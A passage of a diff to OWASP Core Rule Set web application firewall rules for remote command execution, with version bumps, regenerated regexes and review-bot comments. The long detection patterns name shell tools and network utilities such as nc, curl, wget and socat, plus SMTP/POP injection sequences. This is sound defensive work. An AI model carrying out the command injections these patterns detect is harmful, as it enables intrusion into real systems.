x5c?x|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|f|(?:k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?g|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cp]|r(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0
b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)?|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dv]|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dt]|[ghu]|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cr]|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l|[co][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ex]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c)|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|l)|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:i[\"'\)\[\x
5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h))" \ "id:932220,\ phase:2,\ block,\ @@ -474,7 +473,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -494,7 +493,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML: tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.932240_matched_var_name=%{matched_var_name}',\ chain" @@ -517,7 +516,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -525,6 +524,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME "id:932300,\ phase:2,\ block,\ + capture,\ t:none,t:escapeSeqDecode,\ msg:'Remote Command Execution: SMTP Command Execution',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ @@ -535,7 +535,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/137/134',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
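Review bot: Rule 932300's logdata references `%{TX.0}`, and only the `capture,` action added in the `@@ -525,6 +524,7 @@` hunk populates that variable, so before this change the "Matched Data" logged for this rule was presumably empty or left over from an earlier capturing rule. The commit description should say that this is a logging fix rather than a detection change, since the surrounding hunks are otherwise version bumps. It is worth checking whether the other rules in this file whose logdata uses `%{TX.0}` already carry `capture`; the action lists of 932220 and 932236 are not fully visible in this chunk.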
@@ -553,11 +553,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/137/134',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n.*?\b(?:(?:LIST|TOP [0-9]+)(?: [0-9]+)?|U(?:SER .+?|IDL(?: [0-9]+)?)|PASS .+?|(?:RETR|DELE) [0-9]+?|A(?:POP [0-9A-Z_a-z]+ [0-9a-f]{32}|UTH [\-0-9A-Z_]{1,20} (?:(?:[\+/-9A-Z_a-z]{4})*(?:[\+/-9A-Z_a-z]{2}=|[\+/-9A-Z_a-z]{3}))?=))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n.*?\b(?:(?:LIST|TOP [0-9]+)(?: [0-9]+)?|U(?:SER .+?|IDL(?: [0-9]+)?)|PASS .+?|(?:RETR|DELE) [0-9]+?|A(?:POP [0-9A-Z_a-z]+ [0-9a-f]{32}|UTH [\-0-9_a-z]{1,20} (?:(?:[\+/-9A-Z_a-z]{4})*(?:[\+/-9A-Z_a-z]{2}=|[\+/-9A-Z_a-z]{3}))?=))" \ "id:932320,\ phase:2,\ block,\ 
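Review bot: The only change to the 932320 expression is `[\-0-9A-Z_]{1,20}` becoming `[\-0-9_a-z]{1,20}` in the `AUTH` branch, and under the `(?is)` prefix the two classes match the same input, so this looks like regenerated output rather than a detection change. The commit description should state that the regex update for this rule is semantically neutral, otherwise a reviewer has to diff two long generated strings to discover that. Regenerating the expression alongside the version bump is fine, but a mixed hunk like this is exactly where a real change would be easy to miss.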
@@ -571,11 +571,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/137/134',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0
b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\x0b&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|pt(?:[\s\x0b&\)<>\|]|-get)|r(?:[\s\x0b&\)<>j\|]|(?:p|ch)[\s\x0b&\)<>\|]|ia2c)|s(?:h[\s\x0b&\)<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|tobm)|b(?:z(?:z[\s\x0b&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[89]9|(?:a(?:t|ncel|psh)|c)[\s\x0b&\)<>\|]|mp|p(?:[\s\x0b&\)<>\|]|an|io|ulimit)|s(?:h|cli[\s\x0b&\)<>\|]|plit|vtool)|
u(?:(?:t|rl)[\s\x0b&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>\|]|tab)))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\x0b&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\x0b&\)<>\|]|n(?:v(?:[\s\x0b&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\x0b&\)<>h\|]|ac)|x(?:(?:ec)?[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\x0b&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\)<>\|]|le(?:[\s\x0b&\)<>\|]|test))|mt|tp(?:[\s\x0b&\)<>\|]|stats|who)|acter|o(?:ld[\s\x0b&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\x0b]|ore)|db|e(?:(?:m|tfacl)[\s\x0b&\)<>\|]|ni(?:e[\s\x0b&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\x0b&\)<>\|]|nsh)|(?:o|awk)[\s\x0b&\)<>\|]|pg|r(?:c|ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|])|l(?:d(?:d?[\s\x0b&\)<>\|]|config)|(?:[np]|inks|ynx)[\s\x0b&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\x0b&\)<>\|]|(?:la)?tex)|z(?:[\s\x0b&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(
?:n|ke)[\s\x0b&\)<>\|]|il(?:[\s\x0b&\)<>q\|]|x[\s\x0b&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\x0b&\)<>\|]|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\x0b&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\x0b&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\x0b&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\x0b&\)<>\|]|m(?:[\s\x0b&\)<>\|]|ap)|p(?:m[\s\x0b&\)<>\|]|ing)|a(?:no[\s\x0b&\)<>\|]|sm|wk)|o(?:de[\s\x0b&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\x0b&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\x0b&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\x0b&\)<>\|]|p[^\s\x0b]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\x0b&\)<>\|]|int(?:env|f[\s\x0b&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\x0b&\)<>\|]|shd)|y(?:thon[^\s\x0b]|3?versions))|r(?:a(?:r[\s\x0b&\)<>\|]|k(?:e[\s\x0b&\)<>\|]|u))|c(?:p[\s\x0b&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\x0b&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\)<>\|]|user)|pm(?:[\s\x0b&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\x0b&\)<>\|]|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|(?:hed|r(?:een|ipt))[\s\x0b&\)<>\|])|e(?:(?:d|lf|rvice)[\s\x0b&\)<>\|]|t(?:(?:facl)?[\s\x0b&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash|nap)[\s\x0b&\)<>\|]|h(?:(?:adow|ells)?[\s\x0b&\)<>\|]|\.distrib|u(?:f|tdown[\s\x0b&\)<>\|]))|s(?:[\s\x0b&\)<>\|]|h(?:[\s\x0b&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\x0b&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\x0b&\)<>\|]|il[\s\x0b&\)<>f\|]|sk(?:[\s\x
0b&\)<>\|]|set))|bl|c(?:p(?:[\s\x0b&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\x0b&\)<>\|]|lnet)|i(?:c[\s\x0b&\)<>\|]|me(?:datectl|out[\s\x0b&\)<>\|]))|o(?:p|uch[\s\x0b&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\)<>\|]|diff)|ew[\s\x0b&\)<>\|]|gr|pw|rsh|sudo)|algrind|olatility[\s\x0b&\)<>\|])|w(?:3m|c|a(?:ll|tch)[\s\x0b&\)<>\|]|get|h(?:iptail[\s\x0b&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\x0b&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\x0b&\)<>\|]|um)|z(?:ip(?:[\s\x0b&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|less|more|run|ypper))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|